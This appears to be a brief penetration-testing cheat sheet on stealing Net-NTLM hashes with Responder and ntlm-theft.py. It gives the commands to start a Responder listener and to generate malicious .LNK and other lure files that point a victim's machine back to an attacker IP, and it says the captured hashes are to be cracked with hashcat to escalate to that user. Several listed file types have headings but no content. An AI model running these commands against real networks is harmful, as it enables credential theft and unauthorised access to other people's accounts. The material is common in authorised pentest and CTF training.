Responder
Net-NTLM Hash stealing with Responder
Tools synergizing with Responder: ntlm-theft.py
Requirements: The user you want to escalate to should react with your malicious file/responder SMB server in a way that it calls back to your responder listener to dump his Net-NTLM hash to crack with hashcat.
Usage:
sudo responder -I tun0 (Turn on responder)There are various ways to steal hashes with responder, but they have all similar philosophy behind the technique
.LNK Files
python3 ntlm-theft.py -g all -s OUR_IP -f FOLDER
sudo responder -I tun0 .CHM Files
.SCF Files
.PDF Files
Last updated